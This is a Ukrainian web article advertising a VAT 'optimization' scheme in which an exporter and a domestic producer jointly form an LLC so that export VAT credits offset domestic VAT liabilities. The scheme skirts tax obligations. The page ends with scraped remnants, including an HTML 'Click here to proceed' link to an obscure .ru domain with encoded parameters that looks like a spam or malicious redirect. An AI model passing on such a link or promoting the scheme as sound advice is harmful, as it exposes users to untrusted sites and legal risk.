Статьи

Схема оптимізації ПДВ. Створюємо нову компанію

Раніше  ми вже Вам розповідали, яким чином можна відшкодувати від’ємний ПДВ шляхом експорту продукції не безпосередньо експортером, а через інше вітчизняне підприємство, яке має значні обороти ПДВ до сплати в бюджет.

Але складність такої схеми оптимізації  ПДВ полягає в тому, що однопрофільному підприємству не завжди зручно  починати показувати  абсолютно новий вид діяльності. У зв’язку з чим ми пропонуємо Вам іншу схему оптимізації податків.

В нас є два підприємства:  Підприємство А та Підприємство Б.

Підприємство А припустимо реалізує на експорт український кришталь а Підприємство Б виробляє шампанське, яке продається на території  України

І от уявімо, що завод шампанських вин ні з того ні з сього диверсифікував  свою діяльність та доповнив її експортом кришталю.

Яким же чином створити схему оптимізації податку на додану вартість?

оптимізації ПДВ шляхом створення нової компанії

Ці два підприємства створюють на дольових частках товариство з обмеженою відповідальністю назвемо його «ХХХ». Через новостворену компанію реалізовується за стандартними договорами купівлі — продажу продукція: кришталь - експортується з усіма експортними формальностями, а шампанське продається на території України.

Плюси такої схеми оптимізації податків

Податкові зобов’язання по внутрішнім продажам перекриваються  податковим  кредитом по експорту та по розрахункам з бюджетом у   ТОВ «ХХХ» виходить баланс

У виробників кришталю не виникає необхідності по відшкодуванню ПДВ, тому що в них звичайні  внутрішньоукраїнські  операції, ПДВ за якими не сплачується, а гаситься за рахунок не відшкодованого раніше податку

Декларация по налогу на прибыль.

Прибуток же шампаністів від такої оптимізації , який потрібен для  відшкодування лише експортерам забезпечується за рахунок:

  • Або за рахунок більшої частки виноробів в статутному капіталі   ТОВ «ХХХ» чи у виробників кришталю.
  • Або за рахунок того що шампаністи  продають ТОВ «ХХХ» свій товар з меншою знижкою, а ніж виробники кришталю продають свій . в той же час прибуток розподіляється від діяльності   ТОВ «ХХХ»  пропорційно повному обігу кожного з двох видів продукції.

Хочемо звернути увагу на те що членів  ТОВ може бути більше, а ніж двоє.

 В статті була розглянута схема оптимізації ПДВ за рахунок створення двома  підприємства  нової компанії, одне з яких являється експортером, а інше продає свою продукцію на внутрішньому ринку.

Оптимізуйте оподаткування на Вашому підприємстві, вибравши для співпраці на нашому сайті ТаксОптима компанію, яка підходить Вам. Ви працюєте з обраним контрагентом самостійно без посередників.

comments powered by HyperComments
Схема оптимізації ПДВ. Створюємо нову компанію

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=wNlw%2FuwOyuWlFWo%2F%2BJl6uGJ2XtuFx9BH7%2BZBoJmtO2ieSiBJs7esUYGs7K8%2F%2FOqSTwwVfjCaDudUnwGGN%2F2IDAa3h%2BmxMxNEqUXC3PGpJFf28gioyN1eVc13%2FdyfKMaZXC%2BWMIViJhwly69hzIQsleJuiD46thbYjon%2B%2FM6cRaI%3D&t=nfrm">Click here to proceed</a>. </body>